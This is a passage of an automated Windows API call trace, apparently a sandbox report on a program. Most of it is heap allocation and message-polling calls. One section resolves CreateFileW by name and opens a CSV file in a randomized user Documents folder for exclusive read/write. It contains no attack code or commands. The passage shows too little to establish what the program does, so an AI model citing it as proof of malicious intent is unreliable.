(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.748] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.749] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.749] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0179.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.750] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0179.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0179.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\rdv9bzzuy is9hirae.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd5488 | out: hHeap=0x8a0000) returned 1 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.753] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.755] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0179.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: 